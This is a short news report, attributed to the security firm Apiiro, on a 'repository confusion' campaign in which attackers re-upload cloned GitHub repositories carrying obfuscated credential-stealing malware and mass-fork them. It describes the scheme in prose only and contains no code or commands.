Potentially millions of GitHub repositories infected in ‘repository confusion’ campaign

600,000 background checks leaked from publicly accessible database

Potentially millions of GitHub repositories infected in ‘repository confusion’ campaign

According to new reports, potentially millions of GitHub repositories have been infected with malware in a unique “repository confusion” attack.

According to cloud security firm Apiiro, more than 100,000 repositories have been compromised on GitHub, but the real number may be in the millions.

Threat actors are using what is known as a “repository confusion” attack, which takes advantage of the way the GitHub system manages repository names.

First, attackers clone copies of popular GitHub repositories such as TwitterFollowBot, WhatsappBOT, discord-boost-tool, Twitch-Follow-Bot, and more.

Once downloaded, attackers infect them with malware loaders, such as those designed to steal credentials, browser data, and other sensitive information.

The repositories are then re-uploaded to GitHub with the exact same names in the hope that developers who want to use the repositories will unknowingly download the infected ones.

To maximize success, hackers automatically fork infected repositories thousands of times and promote them on forums, Discord, and other places online.

While GitHub quickly removes many forked repositories, its automated security appears to miss many, particularly those that have been uploaded manually.

When an unsuspecting developer uses an infected repository, the malware begins to decompress a payload that has been hidden under seven layers of obfuscation.

In this process, malicious Python code and a specifically modified version of the BlackCap-Grabber malware are extracted and begin collecting sensitive information such as login details, passwords, personal data, and more.

This data is then transmitted to a command and control server managed by the threat actors.

The repository confusion campaign was first observed in May last year, according to Apiiro, and has begun to gain steam in recent months, with the number of infected repositories surpassing 100,000 in November 2023. While it is not confirmed , the real number could be in the millions. .

Apiiro noted that malicious packages containing the payload in question first appeared in the Python Package Index (PyPi) in May 2023.

Just two months later, when PyPi began removing malicious payloads, threat actors began uploading infected repositories manually.

Leave a Reply

Your email address will not be published. Required fields are marked *